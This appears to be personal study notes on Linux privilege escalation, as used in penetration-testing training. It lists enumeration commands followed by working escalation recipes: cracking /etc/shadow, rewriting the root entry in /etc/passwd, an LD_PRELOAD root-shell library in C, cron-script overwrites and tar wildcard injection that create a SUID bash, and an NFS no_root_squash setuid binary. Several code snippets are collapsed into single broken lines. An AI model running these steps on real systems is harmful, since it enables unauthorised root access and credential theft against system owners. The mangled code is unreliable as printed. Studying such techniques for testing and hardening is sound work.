😎Linux Privilege Escalation

Manual Enumeration

1. 1.System Enumeration

• hostname ⇒ name that identifies a device in a network

• uname -a ,, cat /etc/issue ,, cat /proc/version => get info about kernal or

• lscpu => get info about cpu and treads

• ps aux | grep "root" ⇒ get process run as root perm

• ps aux | grep “root” =>Enumerating Program Versions

• dpkg -l | grep <program> => dpkg can show installed programs and their version

​

1. 2.User Enumeration

• whoami ⇒ get current user

• id ⇒ get user identification in system

• find / -user username ⇒ get current user permission

• sudo -l => get what we can run as root without pass

• cat /etc/passwd

• cat /etc/shadow

​3- Network Enumeration

• ifconfig / ip a ⇒ get information about network

• cat /etc/resolve.conf ⇒ get information about DNS

• ip route ⇒ print routing table

• arp -a / ip neigh ⇒ get arp cache

• netstat -ano ⇒ get listen ports and connected ports

​💡 Port Forwarding From metasploit :

• portfwd add -l <our_port> -p 80 -r <target_port>

​

Privilege Escalation :

1- Kernal Exploitaion

• exec uname -a get the version of kernal || run linux-exploit-suggester script

• linux-exploit-suggester

• https://github.com/spencerdodd/kernelpop

• searchsploit kernel || looking in GHDB or https://github.com/lucyoa/kernel-exploits

2- Password Hunting :

1. 1.looking for history of user with command : history

2. 2.run linpeas

---

💡 3- weak file permission

• etc/shadow :

• look for permission if we can read /etc/shadow --> cat file and get hash and run john against root hash

• john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

• etc/passwd :

  • if we can writable in it we will Generate a new password hash with a password

  • openssl passwd new_password

  • Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row (replacing the "x"). --> then switch to root

• Find all directories which can be written to : find / -executable -writable -type d 2> /dev/null

• Find all writable files in /etc : find /etc -maxdepth 1 -writable -type f

• Find all readable files in /etc : find /etc -maxdepth 1 -readable -type f

---

4- SSH Key

• look for ssh key :

  • find / -name authorized_keys 2> /dev/null

  • find / -name id_rsa 2> /dev/null

• if we found SSH KEY Copy the key over to your local machine, and give it permissions (600)

  • chmod 600 root_key

  • grep PermitRootLogin /etc/ssh/sshd_config ⇒ make this step to know if machine allowed root log with ssh or not

  • use it to login to ssh if we allowed that : ssh -i root_key root@192.168.1.25

---

5- sudo ( shell escape sequences ) : Best one for me

• regular user can do something as root without password then get privilege

• sudo -l ⇒ list all things we can do

• ​**https://gtfobins.github.io/** go to and look for way to escalate your privilege

🤡 Another Technique :

• if we have something in sudo escape have a specific Function like apache then we can get root hash with :

  • sudo apache2 -f /etc/shadow

  • extract hashes then use su

  ---

💡 6- Environment Variables ( LD_PRELOAD )

• Programs run through sudo can inherit the environment variables

• LD Mean Dynamic Linker

• Trick here we are going to make malicious library run before any other libraries

🤡 steps :

1. 1.Check for LD_PRELOAD (with the env_keep option)

2. 2.Write a simple C code compiled as a share object (.so extension) file

3. 3.Run the program with sudo rights and the LD_PRELOAD option pointing to our .so file

**#include <stdio.h>#include <sys/types.h>#include <stdlib.h>​void _init() {unsetenv("LD_PRELOAD");setgid(0);setuid(0);system("/bin/bash");}**

• save as shell.c

• Compile code : gcc -fPIC -shared -o /tmp/shell.so shell.c -nostartfiles

• run the program by specifying the LD_PRELOAD option ⇒ sudo LD_PRELOAD=/tmp/shell.so (any service from sudo -l )

---

💡 7- SUID ( user + special )

• SUID always executes as the user who owns the file

  • if root is the owner of simple bash script && regular user has SUID then he can execute script as root (owner)

• find / -perm -u=s -type f 2>/dev/null

• go to https://gtfobins.github.io/ and look for exploit
• may be all of result can’t be vulnerable

---

8- Capabilities

• Before capabilities, we only had the binary system of privileged and non-privileged processes to performing permission check ,, such as Root has UID Zero and default user has UID Non Zero

• **Capabilities : similar to SUID But there is a difference

  • Capabilities : maintained by the kernel are those permissions that divide the privileges of kernel user or kernel level programs into small pieces

  • SUID : Stands for set user ID and allows users to execute the file as the file owner

• **Find out what capabilities are Enabled : getcap -r / 2>/dev/null

• search in google with capabilities name to get privilege

---

9- Cron Jobs

• Cron jobs are programs or scripts which users can schedule to run at specific times or intervals.

  • Cron jobs run with the security level of the user who owns them

• it stored in :

  • /etc/crontab The system-wide crontab is located at

  • /var/spool/cron/

  • /var/spool/cron/crontabs/

😃 Overwrite Cron File

1. 1.View the contents of the system-wide crontab: cat /etc/crontab

2. 2.let’s say we find that

3. 3.Locate the location of File : Locate [overwrite.sh](http://overwrite.sh)

4. 4.show our permission for this file : ls -la

5. 5.remove the original file and maka a new one with privilege Technique

6. 6.nano /usr/local/bin/overwrite.sh

#!/bin/bashcp /bin/bash /tmp/bashchmod +xs /tmp/bash

1. 6.then wait a minute to work and run : /tmp/bash -p

🤡 WildCard Cron jobs :

• Steps For Detect

1. 1.cat /etc/crontab

2. 2.notice the script “/usr/local/bin/compress.sh”

3. 3.cat /usr/local/bin/compress.sh

4. 4.notice the wildcard (*) used by ‘tar’.

• Steps For Exploit :

1. 1.make this script

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh

1. 1.touch /home/user/--checkpoint=1

2. 2.touch /home/user/--checkpoint-action=exec=sh\ runme.sh

3. 3.Wait 1 minute for the Bash script to execute.

4. 4./tmp/bash -p

5. 5.type : id

---

---

10- NFS (Network File System) : Privilege

• configured in the /etc/exports

• Steps For check and attack

1. 1.we check if it Vulnerable or not when we see “no_root_squash” in output

2. 2.enumerating mountable shares from our attacking machine. : showmount -e ip

3. 3.Mount an NFS share which have “no_root_squash” in output ⇒ mount -o rw,vers=2 <target ipt>:/<share folder> <directory in my machine>

4. 4.then make script .c in my machine and it will change automatic in target machine :

int main(){ setgid(0);​setuid(0);​system("/bin/bash");​return 0;​}

1. 1.then compile it and make it executable : gcc nfs.c -o nf -w

2. 2.chmod +s nf

3. 3.and run it

​

Some Resources

​https://github.com/TCM-Course-Resources/Linux-Privilege-Escalation-Resources​​https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/​​https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist​